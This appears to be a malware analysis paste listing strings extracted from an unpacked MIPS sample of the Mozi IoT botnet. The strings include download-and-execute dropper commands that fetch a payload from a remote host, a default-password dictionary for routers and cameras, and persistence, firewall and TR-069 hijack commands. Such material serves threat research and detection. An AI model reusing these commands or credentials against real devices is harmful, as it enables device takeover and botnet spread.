Unpacked strings & recent exploits cmd of MOZI #2 (MIPS ELF)

1. Mozi IoT malware has launched another new campaign now.
2. This report contains two (2) parts. (1) unpacked strings of MIPS ELF of (latest) MOZI Linux/IoT malware, (2) the attack types that is also hardcoded. Sample hash is: 4dde761681684d7edad4e5e1ffdb940b
3.  
4. (1) Strings in the unpacked binary
5.  
6. 0x0002c960 sfjsxkfl2dn6ani
7. 0x0002c970 8.8.8.8
8. 0x0002c978 /proc/net/route
9. 0x0002c988 \t00000000\t
10. 0x0002c994 RANDOM
11. 0x0002c99c %s /%s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\nConnection: close\r\n\r\n
12. 0x0002c9e4 GET /cdn-cgi/l/chk_captcha HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\nConnection: close\r\n\r\n
13. 0x0002ca58 HTTP
14. 0x0002ca70 Mozilla/4.0 (Compatible; MSIE 8.0; Windows NT 5.2; Trident/6.0)
15. 0x0002caac Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)
16. 0x0002caf0 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00
17. 0x0002cb34 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; en) Opera 11.00
18. 0x0002cb78 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00
19. 0x0002cbbc Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; de) Opera 11.01
20. 0x0002cc00 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00
21. 0x0002cc44 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
22. 0x0002ccb4 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36
23. 0x0002cd28 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
24. 0x0002cd74 Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
25. 0x0002cdfc Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
26. 0x0002ce48 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
27. 0x0002ceb8 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
28. 0x0002cf28 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56
29. 0x0002cf9c Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7
30. 0x0002d014 Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
31. 0x0002d05c Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)
32. 0x0002d08c Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51
33. 0x0002d0cc Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16
34. 0x0002d118 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A
35. 0x0002d190 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
36. 0x0002d200 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36
37. 0x0002d270 Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36
38. 0x0002d2e4 Mozilla/5.0 (Linux; Android 4.4.3; HTC_0PCV2 Build/KTU84L) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
39. 0x0002d378 Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00
40. 0x0002d3c0 Mozilla/4.0 (compatible; MSIE 9.0; Windows 98; .NET CLR 3.0.04506.30)
41. 0x0002d408 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)
42. 0x0002d448 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; InfoPath.3; SV1; .NET CLR 3.4.53360; WOW64; en-US)
43. 0x0002d4c4 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)
44. 0x0002d52c Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 4.4.58799; WOW64; en-US)
45. 0x0002d5a8 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)
46. 0x0002d5f8 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0
47. 0x0002d64c Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
48. 0x0002d6a0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0
49. 0x0002d6f4 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0
50. 0x0002d74c HEAD
51. 0x0002d754 POST
52. 0x0002d75c ./config
53. 0x0002d768 /tmp/config
54. 0x0002d774 /var/config
55. 0x0002d780 select: %s [%s:%d]\n
56. 0x0002d794 botv2/config.c
57. 0x0002d7a4 connect time out
58. 0x0002d7b8 GET /c HTTP/1.0\n
59. 0x0002d7cc Host: %s\n
60. 0x0002d7d8 %d.%d.%d.%d
61. 0x0002d7e4 %hhu.%hhu.%hhu.%hhu
62. 0x0002d7f8 8.8.8.8 pool.ntp.org ntp.ubuntu.com time.nist.gov
63. 0x0002d834 %lu.%lu.%lu.%lu
64. 0x0002d844 (null)
65. 0x0002d84c [dip]
66. 0x0002d854 [/dip]
67. 0x0002d85c 7001
68. 0x0002d864 [atk]
69. 0x0002d86c [/atk]
70. 0x0002d874 loginok
71. 0x0002d87c Host: %s
72. 0x0002d888 %s:%d
73. 0x0002d890 http
74. 0x0002d898 Server:
75. 0x0002d8a0 Content-Length
76. 0x0002d8b0 HTTP/
77. 0x0002d8b8 complete
78. 0x0002d8c4 gpon8080
79. 0x0002d8d4 gpon80
80. 0x0002d8dc realtek
81. 0x0002d8e4 netgear8080
82. 0x0002d8f0 netgear80
83. 0x0002d8fc huawei
84. 0x0002d904 tr064
85. 0x0002d90c hnap
86. 0x0002d914 camcrossweb
87. 0x0002d920 camjaws
88. 0x0002d928 dlink
89. 0x0002d930 r7064
90. 0x0002d938 vacron
91. 0x0002d944 mv -f %s %s
92. 0x0002d958 1:v4:JBls
93. 0x0002d964 %02X
94. 0x0002d96c %d%c%d%c%d%c%d%c
95. 0x0002d980 %s\t%lX\t%lX
96. 0x0002d98c /etc/rc.d/rc.local
97. 0x0002d9a0 /etc/rc.local
98. 0x0002d9b4 exit
99. 0x0002d9bc \n%s%s
100. 0x0002d9c4 &\nexit 0\n
101. 0x0002d9d8 config
102. 0x0002d9e0 %ld%s%s
103. 0x0002d9e8 &\nexit 1\n
104. 0x0002d9fc %s/%s
105. 0x0002da04 /proc/
106. 0x0002da0c /var/
107. 0x0002da14 /lib/
108. 0x0002da1c /dev/
109. 0x0002da24 /sys/
110. 0x0002da2c cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"
111. 0x0002da90 cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"
112. 0x0002db00 iptables -I INPUT  -p tcp --destination-port 35000 -j DROP
113. 0x0002db3c iptables -I INPUT  -p tcp --destination-port 50023 -j DROP
114. 0x0002db78 iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
115. 0x0002dbb0 iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
116. 0x0002dbe8 iptables -I INPUT  -p tcp --destination-port 7547 -j DROP
117. 0x0002dc24 iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
118. 0x0002dc5c /mnt/jffs2/Equip.sh
119. 0x0002dc70 %s%s%s%s
120. 0x0002dc7c #!/bin/sh
121. 0x0002dc88 /mnt/jffs2/wifi.sh
122. 0x0002dc9c /mnt/jffs2/WifiPerformance.sh
123. 0x0002dcbc /proc/mounts
124. 0x0002dccc %255s %255s %255s %255s\n
125. 0x0002dcf8 /bin/sh
126. 0x0002dd00 /bin/bash
127. 0x0002dd0c /etc/rc.d/
128. 0x0002dd18 /etc/rcS.d/
129. 0x0002dd24 %s%s%s%s%s
130. 0x0002dd34 /etc/init.d/S95baby.sh
131. 0x0002dd4c iptables -I INPUT  -p tcp --destination-port 58000 -j DROP
132. 0x0002dd88 iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
133. 0x0002ddc0 /usr/local/ct
134. 0x0002ddd0 rm /home/httpd/web_shell_cmd.gch
135. 0x0002ddf4 echo 3 > /usr/local/ct/ctadmincfg
136. 0x0002de18 /usr/local/ct/ctadmin0
137. 0x0002de30 sendcmd 1 DB set MgtServer 0 Tr069Enable 1
138. 0x0002de5c sendcmd 1 DB set PdtMiddleWare 0 Tr069Enable 0
139. 0x0002de8c sendcmd 1 DB set MgtServer 0 URL http://127.0.0.1
140. 0x0002dec0 sendcmd 1 DB set MgtServer 0 UserName notitms
141. 0x0002def0 sendcmd 1 DB set MgtServer 0 ConnectionRequestUsername notitms
142. 0x0002df30 sendcmd 1 DB set MgtServer 0 PeriodicInformEnable 0
143. 0x0002df64 sendcmd 1 DB save
144. 0x0002df78 [count]
145. 0x0002df80 [/count]
146. 0x0002df8c [ver]
147. 0x0002df94 [/ver]
148. 0x0002df9c [hp]
149. 0x0002dfa4 [/hp]
150. 0x0002dfb0 /dev/urandom
151. 0x0002dfc0 /dev/random
152. 0x0002dfcc /overlay
153. 0x0002dfd8 mount -o remount,rw /overlay /
154. 0x0002dff8 /overlay/upper
155. 0x0002e008 /overlay/upper/usr
156. 0x0002e01c /overlay/upper/etc
157. 0x0002e030 /overlay/upper/etc/rc.d
158. 0x0002e048 /overlay/upper/etc/init.d
159. 0x0002e064 /overlay/usr
160. 0x0002e074 /overlay/etc
161. 0x0002e084 /overlay/etc/rc.d
162. 0x0002e098 /overlay/etc/init.d
163. 0x0002e0ac /usr/networks
164. 0x0002e0bc /usr/networkstmp
165. 0x0002e0d0 %5hu
166. 0x0002e0d8 GET %s HTTP/1.1\r\nHost: %s\r\nConnection: Keep-Alive\r\nContent-Type: application/octet-stream\r\nReferer: http://baidu.com/%s/%s/%d/%s/%s%s)\r\n\r\n
167. 0x0002e164 GET %s HTTP/1.1\r\nHost: %s\r\nConnection: Keep-Alive\r\nContent-Type: application/octet-stream\r\n\r\n
168. 0x0002e1c4 HTTP/1.1
169. 0x0002e1d0 Content-Length:
170. 0x0002e1e0 Content-Type:
171. 0x0002e1f0 no aliases
172. 0x0002e200 [ud]
173. 0x0002e208 [/ud]
174. 0x0002e210 confirmed.list
175. 0x0002e220 new.list
176. 0x0002e22c kill -9 %d
177. 0x0002e238 baby
178. 0x0002e240 [dr]
179. 0x0002e248 [/dr]
180. 0x0002e254 botv2/headers/down.h
181. 0x0002e26c 1:v4:
182. 0x0002e278 2:id20:
183. 0x0002e280 9:info_hash20:
184. 0x0002e290 porti
185. 0x0002e298 6:target20:
186. 0x0002e2a4 5:token
187. 0x0002e2ac 5:nodes
188. 0x0002e2b4 6:nodes6
189. 0x0002e2c0 6:valuesl
190. 0x0002e2cc 4:wantl
191. 0x0002e2dc 1:y1:r
192. 0x0002e2e4 1:y1:e
193. 0x0002e2ec 1:y1:q
194. 0x0002e2f4 1:q4:ping
195. 0x0002e300 1:q9:find_node
196. 0x0002e310 1:q9:get_peers
197. 0x0002e320 1:q13:announce_peer
198. 0x0002e334 d1:eli%de%d:
199. 0x0002e344 e1:t%d:
200. 0x0002e34c 1:y1:ee
201. 0x0002e354 d1:rd2:id20:
202. 0x0002e364 5:nodes%d:
203. 0x0002e370 6:nodes6%d:
204. 0x0002e37c 1:y1:re
205. 0x0002e384 d1:ad2:id20:
206. 0x0002e394 2:n4
207. 0x0002e39c 2:n6
208. 0x0002e3a4 4:wantl%s%se
209. 0x0002e3b4 e1:q9:find_node1:t%d:
210. 0x0002e3cc 1:y1:qe
211. 0x0002e3d8 e1:q4:ping1:t%d:
212. 0x0002e3f0 [cpux]
213. 0x0002e3f8 [/cpux]
214. 0x0002e400 [cpu]
215. 0x0002e408 [/cpu]
216. 0x0002e410 [ssx]
217. 0x0002e418 [/ssx]
218. 0x0002e420 [ss]
219. 0x0002e428 [/ss]
220. 0x0002e430 none
221. 0x0002e438 [sv]
222. 0x0002e440 [/sv]
223. 0x0002e448 [rn]
224. 0x0002e450 [/rn]
225. 0x0002e458 run:
226. 0x0002e460 [nd]
227. 0x0002e468 [/nd]
228. 0x0002e470 /tmp
229. 0x0002e478 /var
230. 0x0002e480 /temp
231. 0x0002e488 iptables -I INPUT  -p udp --destination-port %d -j ACCEPT
232. 0x0002e4c4 iptables -I OUTPUT -p udp --source-port %d -j ACCEPT
233. 0x0002e4fc iptables -I PREROUTING  -t nat -p udp --destination-port %d -j ACCEPT
234. 0x0002e544 iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT
235. 0x0002e588 0.0.0.0
236. 0x0002e590 [idp]
237. 0x0002e598 This node doesn t accept announces
238. 0x0002e5bc dht.transmissionbt.com:6881
239. 0x0002e5d8 router.bittorrent.com:6881
240. 0x0002e5f4 router.utorrent.com:6881
241. 0x0002e610 bttracker.debian.org:6881
242. 0x0002e62c 212.129.33.59:6881
243. 0x0002e640 82.221.103.244:6881
244. 0x0002e654 130.239.18.159:6881
245. 0x0002e668 87.98.162.88:6881
246. 0x0002e67c /temp/
247. 0x0002e684 /var/tmp/
248. 0x0002e690 /var/run/
249. 0x0002e69c /usr/
250. 0x0002e6a4 /mnt/
251. 0x0002e6ac /home/
252. 0x0002e6b4 http://
253. 0x0002e6bc https://
254. 0x0002e750 GET /c
255. 0x0002e760 HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Length: %d\r\nConnection: close\r\nContent-Type: application/zip\r\n\r\n loginok
256. 0x0002e7d4 HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Length: %d\r\nConnection: close\r\nContent-Type: application/zip\r\n\r\n
257. 0x0002e840 iptables -I INPUT  -p tcp --destination-port %d -j ACCEPT
258. 0x0002e87c iptables -I OUTPUT -p tcp --source-port %d -j ACCEPT
259. 0x0002e8b4 iptables -I PREROUTING  -t nat -p tcp --destination-port %d -j ACCEPT
260. 0x0002e8fc iptables -I POSTROUTING -t nat -p tcp --source-port %d -j ACCEPT
261. 0x0002e940 iptables -I INPUT  -p tcp --destination-port 22 -j DROP
262. 0x0002e978 iptables -I INPUT  -p tcp --destination-port 23 -j DROP
263. 0x0002e9b0 iptables -I INPUT  -p tcp --destination-port 2323 -j DROP
264. 0x0002e9ec iptables -I OUTPUT -p tcp --source-port 22 -j DROP
265. 0x0002ea20 iptables -I OUTPUT -p tcp --source-port 23 -j DROP
266. 0x0002ea54 iptables -I OUTPUT -p tcp --source-port 2323 -j DROP
267. 0x0002ea8c /dev/watchdog
268. 0x0002ea9c /dev/watchdog0
269. 0x0002eaac /dev/misc/watchdog
270. 0x0002eac0 /etc/watchdog
271. 0x0002ead0 /dev/FTWDT101_watchdog
272. 0x0002eae8 /dev/FTWDT101\\ watchdog
273. 0x0002eb00 /dev/FTWDT101/watchdog
274. 0x0002eb18 /sbin/watchdog
275. 0x0002eb28 /bin/watchdog
276. 0x0002eb38 /etc/default/watchdog
277. 0x0002eb50 /proc/%d/status
278. 0x0002eb60 %*s %s
279. 0x0002eb68 /proc/net/raw
280. 0x0002eb78 /proc/net/tcp
281. 0x0002eb8c killall -9 %s
282. 0x0002eb9c /proc
283. 0x0002eba4 /proc/%s/exe
284. 0x0002ebb4 /run
285. 0x0002ebbc /baby
286. 0x0002ebc4 /usr/bin/python
287. 0x0002ebd4 sshd
288. 0x0002ebdc dropbear
289. 0x0002ebe8 255.255.255.255
290. 0x0002ebf8 255.255.0.0
291. 0x0002ec04 %08X%08X%08X%08X%08X%08X
292. 0x0002ecfb Oh.o
293. 0x0002ed20 [debug] >>> %s
294. 0x0002ed30 -ne ELF
295. 0x0002ed38 sage:
296. 0x0002ed40 /bin/busybox cat /bin/ls|head -n 1\r\n
297. 0x0002ed68 /bin/busybox hexdump -e `16/1 "%c"` -n 52 /bin/ls\r\n
298. 0x0002ed9c /bin/busybox cat /bin/ls|more\r\n
299. 0x0002edc0 dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox\r\n
300. 0x0002ee4c /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox\r\n
301. 0x0002ef00 sparc
302. 0x0002ef08 i686
303. 0x0002ef10 m68k
304. 0x0002ef18 powerpc
305. 0x0002ef24 superh
306. 0x0002ef2c x86_64
307. 0x0002ef34 mipsel
308. 0x0002ef3c mips
309. 0x0002ef44 \\x%02x
310. 0x0002ef54 /bin/busybox chmod 777 Mozi || (cp /bin/ls Mozz;cat Mozi>Mozz;rm Mozi;cp Mozz Mozi;rm Mozz)
311. 0x0002efb4 /bin/busybox echo  -en `%s` %s Mozi; %s ;/bin/busybox echo -en `\\x44\\x52\\x4f\\x50\\x50\\x45\\x52`\r\n
312. 0x0002f014 /bin/busybox echo '%s' %s Mozi; %s ; /bin/busybox echo '\\x44\\x52\\x4f\\x50\\x50\\x45\\x52'\r\n
313. 0x0002f06c ./Mozi %d %d %d %d %d;./Runn;/bin/busybox echo -e '\\x63\\x6F\\x6E\\x6E\\x65\\x63\\x74\\x65\\x64'\r\n
314. 0x0002f0c8 connected
315. 0x0002f0d4 nvalid
316. 0x0002f0dc ailed
317. 0x0002f0e4 ncorrect
318. 0x0002f0f0 enied
319. 0x0002f0f8 rror
320. 0x0002f100 oodbye
321. 0x0002f114 shell
322. 0x0002f11c dvrdvs
323. 0x0002f124 mdm9625
324. 0x0002f12c 9615-cdp
325. 0x0002f140 #user
326. 0x0002f148 ogin
327. 0x0002f150 name
328. 0x0002f158 pass
329. 0x0002f160 busybox
330. 0x0002f168 cd /tmp || cd /var/ || cd /var/run || cd /mnt || cd /root || cd /; rm -rf i; wget http://%s:%d/i; curl -O http://%s:%d/i; /bin/busybox wget http://%s:%d/i; chmod 777 i || (cp /bin/ls ii;cat i>ii;rm i;cp ii i;rm ii); ./i; echo -e '\\x63\\x6F\\x6E\\x6E\\x65\\x63\\x74\\x65\\x64'\r\n
331. 0x0002f278 cd /tmp || cd /var/ || cd /var/run || cd /mnt || cd /root || cd /; rm -rf i; wget http://%s:%d/bin.sh; curl -O http://%s:%d/bin.sh; /bin/busybox wget http://%s:%d/bin.sh; chmod 777 bin.sh || (cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh); sh bin.sh %s; echo -e '\\x63\\x6F\\x6E\\x6E\\x65\\x63\\x74\\x65\\x64'\r\n
332. 0x0002f3c4 start\r\nenable\r\nconfig terminal\r\nsystem\r\nlinuxshell\r\nsu\r\nshell\r\nsh\r\ncd /tmp || cd /var/ || cd /var/run || cd /mnt || cd /root || cd /;/bin/busybox echo -ne '\\x45\\x4c\\x46'\r\n
333. 0x0002f470 /bin/busybox wget;/bin/busybox echo -ne '\\x45\\x4c\\x46'\r\n
334. 0x0002f4ac DROPPER
335. 0x0002f4ff troot
336. 0x0002f508 admin
337. 0x0002f510 CUAdmin
338. 0x0002f51c default
339. 0x0002f528 rapport
340. 0x0002f534 super
341. 0x0002f53c telnetadmin
342. 0x0002f54c !!Huawei
343. 0x0002f558 keomeo
344. 0x0002f560 support
345. 0x0002f56c CMCCAdmin
346. 0x0002f578 e8telnet
347. 0x0002f584 e8ehome1
348. 0x0002f590 e8ehome
349. 0x0002f59c user
350. 0x0002f5a4 mother
351. 0x0002f5ac Administrator
352. 0x0002f5bc service
353. 0x0002f5c8 supervisor
354. 0x0002f5d4 guest
355. 0x0002f5dc admin1
356. 0x0002f5e4 administrator
357. 0x0002f5f4 666666
358. 0x0002f5fc 888888
359. 0x0002f604 ubnt
360. 0x0002f60c tech
361. 0x0002f614 xc3511
362. 0x0002f61c vizxv
363. 0x0002f624 Pon521
364. 0x0002f62c e2008jl
365. 0x0002f638 r@p8p0r+
366. 0x0002f644 GM8182
367. 0x0002f64c gpon
368. 0x0002f654 Zte521
369. 0x0002f65c hg2x0
370. 0x0002f664 epicrouter
371. 0x0002f670 conexant
372. 0x0002f67c xJ4pCYeW
373. 0x0002f688 v2mprt
374. 0x0002f690 PhrQjGzk
375. 0x0002f69c h@32LuyD
376. 0x0002f6a8 gw1admin
377. 0x0002f6b4 adminpass
378. 0x0002f6c0 xmhdipc
379. 0x0002f6cc juantech
380. 0x0002f6d8 @HuaweiHgw
381. 0x0002f6e4 adminHW
382. 0x0002f6f0 2010vesta
383. 0x0002f6fc 2011vesta
384. 0x0002f708 plumeria0077
385. 0x0002f718 cat1029
386. 0x0002f724 123456
387. 0x0002f72c 54321
388. 0x0002f738 hi3518
389. 0x0002f740 password
390. 0x0002f74c 12345
391. 0x0002f754 fucker
392. 0x0002f75c pass
393. 0x0002f764 admin1234
394. 0x0002f770 1111
395. 0x0002f778 smcadmin
396. 0x0002f784 1234
397. 0x0002f78c klv123
398. 0x0002f794 klv1234
399. 0x0002f7a8 jvbzd
400. 0x0002f7b0 anko
401. 0x0002f7b8 zlxx
402. 0x0002f7c0 7ujMko0vizxv
403. 0x0002f7d0 7ujMko0admin
404. 0x0002f7e0 system
405. 0x0002f7e8 ikwb
406. 0x0002f7f0 dreambox
407. 0x0002f7fc realtek
408. 0x0002f808 00000000
409. 0x0002f814 1111111
410. 0x0002f820 meinsm
411. 0x0002f9fe ATU1
412. 0x0002fa95 fﾇ・0
413. 0x0002fbfb \n\r\n\ru
414. 0x0002fcb8 Mozi\n
415. 0x0002fcbe /proc/self/cmdline
416. 0x0002fcd1 Runn
417. 0x0002fcd6 ERR\n
418. 0x0002fcdb GET /Mozi.6 HTTP/1.0\r\n\r\n
419. 0x0002fcf4 FIN\n
420. 0x0002fe79 .shstrtab
421. 0x0002fe83 .text
422. 0x0002fe89 .rodata
423. 0x0002fe91 .bss
424. 0x00030490 \n\r\n\rx
425. 0x00030514 /proc/self/cmdline
426. 0x00030528 Runn
427. 0x00030530 ERR\n
428. 0x00030538 GET /Mozi.7 HTTP/1.0\r\n\r\n
429. 0x00030554 FIN\n
430. 0x0003056d aeabi
431. 0x00030579 .shstrtab
432. 0x00030583 .text
433. 0x00030589 .rodata
434. 0x00030591 .got
435. 0x00030596 .bss
436. 0x0003059b .ARM.attributes
437. 0x00030b98 Mozi\n
438. 0x00030ba0 /proc/self/cmdline
439. 0x00030bb8 Runn
440. 0x00030bc0 ERR\n
441. 0x00030bc8 GET /Mozi.c HTTP/1.0\r\n\r\n
442. 0x00030be8 FIN\n
443. 0x00030bf1 .shstrtab
444. 0x00030bfb .text
445. 0x00030c01 .rodata
446. 0x00030c09 .bss
447. 0x0003122e \r\n4B\r\n
448. 0x00031420 Mozi\n
449. 0x00031428 /proc/self/cmdline
450. 0x0003143c Runn
451. 0x00031444 ERR\n
452. 0x0003144c GET /Mozi.m HTTP/1.0\r\n\r\n
453. 0x00031468 FIN\n
454. 0x000314d9 .shstrtab
455. 0x000314e3 .text
456. 0x000314e9 .rodata
457. 0x000314f1 .got
458. 0x000314f6 .bss
459. 0x000314fb .mdebug.abi32
460. 0x000319d5 RPSW
461. 0x00031a17 [^_]
462. 0x00031a28 UWVS
463. 0x00031a48 ﾍ€[^_]=
464. 0x00031a77 Mozi\n
465. 0x00031a7d /proc/self/cmdline
466. 0x00031a90 Runn
467. 0x00031a95 ERR\n
468. 0x00031a9a GET /Mozi.x HTTP/1.0\r\n\r\n
469. 0x00031ab3 FIN\n
470. 0x00031ab9 .shstrtab
471. 0x00031ac3 .text
472. 0x00031ac9 .rodata
473. 0x00031ad1 .bss
474. 0x00031fe0 \n\r\n\rﾐ・
475. 0x0003202c Mozi\n
476. 0x00032034 /proc/self/cmdline
477. 0x00032048 Runn
478. 0x00032050 ERR\n
479. 0x00032058 GET /Mozi.a HTTP/1.0\r\n\r\n
480. 0x00032074 FIN\n
481. 0x0003207d .shstrtab
482. 0x00032087 .text
483. 0x0003208d .rodata
484. 0x00032095 .bss
485. 0x000325c8 Mozi\n
486. 0x000325d0 /proc/self/cmdline
487. 0x000325e4 Runn
488. 0x000325ec ERR\n
489. 0x000325f4 GET /Mozi.s HTTP/1.0\r\n\r\n
490. 0x00032610 FIN\n
491. 0x00032619 .shstrtab
492. 0x00032623 .text
493. 0x00032629 .rodata
494. 0x00032631 .bss
495. 0x00032c2a Mozi\n
496. 0x00032c30 /proc/self/cmdline
497. 0x00032c43 Runn
498. 0x00032c48 ERR\n
499. 0x00032c4d GET /Mozi.r HTTP/1.0\r\n\r\n
500. 0x00032c66 FIN\n
501. 0x000336ed .shstrtab
502. 0x000336f7 .text
503. 0x000336fd .rodata
504. 0x00033705 .tbss
505. 0x0003370b .got
506. 0x00033d03 \b\r\n\r\n
507. 0x00033d74 Mozi\n
508. 0x00033d7c /proc/self/cmdline
509. 0x00033d90 Runn
510. 0x00033d98 ERR\n
511. 0x00033da0 GET /Mozi.b HTTP/1.0\r\n\r\n
512. 0x00033dbc FIN\n
513. 0x00033dc5 .shstrtab
514. 0x00033dcf .text
515. 0x00033dd5 .rodata
516. 0x00033ddd .bss
517. 0x00034578 Mozi\n
518. 0x00034580 /proc/self/cmdline
519. 0x00034598 Runn
520. 0x000345a0 ERR\n
521. 0x000345a8 GET /Mozi.4 HTTP/1.0\r\n\r\n
522. 0x000345c8 FIN\n
523. 0x00034689 .shstrtab
524. 0x00034693 .text
525. 0x00034699 .rodata
526. 0x000346a1 .got
527. 0x000346a6 .bss
528. 0x00034cd2 Mozi\n
529. 0x00034cd8 /proc/self/cmdline
530. 0x00034ceb Runn
531. 0x00034cf0 ERR\n
532. 0x00034cf5 GET /Mozi.k HTTP/1.0\r\n\r\n
533. 0x00034d0e FIN\n
534. 0x00034d15 .shstrtab
535. 0x00034d1f .text
536. 0x00034d25 .rodata
537. 0x00034d2d .bss
538. 0x00035594 Mozi\n
539. 0x0003559c /proc/self/cmdline
540. 0x000355b0 Runn
541. 0x000355b8 ERR\n
542. 0x000355c0 GET /Mozi.l HTTP/1.0\r\n\r\n
543. 0x000355dc FIN\n
544. 0x0003564d .shstrtab
545. 0x00035657 .text
546. 0x0003565d .rodata
547. 0x00035665 .got
548. 0x0003566a .bss
549. 0x0003566f .mdebug.abi32
550. 0x00035cf4 Mozi\n
551. 0x00035cfc /proc/self/cmdline
552. 0x00035d10 Runn
553. 0x00035d18 ERR\n
554. 0x00035d20 GET /Mozi.p HTTP/1.0\r\n\r\n
555. 0x00035d3c FIN\n
556. 0x00035d45 .shstrtab
557. 0x00035d4f .text
558. 0x00035d55 .rodata
559. 0x00035d5d .sbss
560. 0x00035e50 (nil)
561. 0x00035e6f \b\n\n\n
562. 0x00035e80 hlLjztqZ
563. 0x00035ec0 npxXoudifFeEgGaACScs
564. 0x00035f17 \a\b\t\n\v\f\r
565. 0x00035f3a #$%&`()*+,234567
566. 0x00035f4b ;<=>?@ABCDEFGJIMOPQRSTUVWX[\\^_`abcxyz{|}~
567. 0x00035f90 Unknown error
568. 0x00035fa0 Success
569. 0x00035fa8 Operation not permitted
570. 0x00035fc0 No such file or directory
571. 0x00035fda No such process
572. 0x00035fea Interrupted system call
573. 0x00036002 Input/output error
574. 0x00036015 No such device or address
575. 0x0003602f Argument list too long
576. 0x00036046 Exec format error
577. 0x00036058 Bad file descriptor
578. 0x0003606c No child processes
579. 0x0003607f Resource temporarily unavailable
580. 0x000360a0 Cannot allocate memory
581. 0x000360b7 Permission denied
582. 0x000360c9 Bad address
583. 0x000360d5 Block device required
584. 0x000360eb Device or resource busy
585. 0x00036103 File exists
586. 0x0003610f Invalid cross-device link
587. 0x00036129 No such device
588. 0x00036138 Not a directory
589. 0x00036148 Is a directory
590. 0x00036157 Invalid argument
591. 0x00036168 Too many open files in system
592. 0x00036186 Too many open files
593. 0x0003619a Inappropriate ioctl for device
594. 0x000361b9 Text file busy
595. 0x000361c8 File too large
596. 0x000361d7 No space left on device
597. 0x000361ef Illegal seek
598. 0x000361fc Read-only file system
599. 0x00036212 Too many links
600. 0x00036221 Broken pipe
601. 0x0003622d Numerical argument out of domain
602. 0x0003624e Numerical result out of range
603. 0x0003626c Resource deadlock avoided
604. 0x00036286 File name too long
605. 0x00036299 No locks available
606. 0x000362ac Function not implemented
607. 0x000362c5 Directory not empty
608. 0x000362d9 Too many levels of symbolic links
609. 0x000362fc No message of desired type
610. 0x00036317 Identifier removed
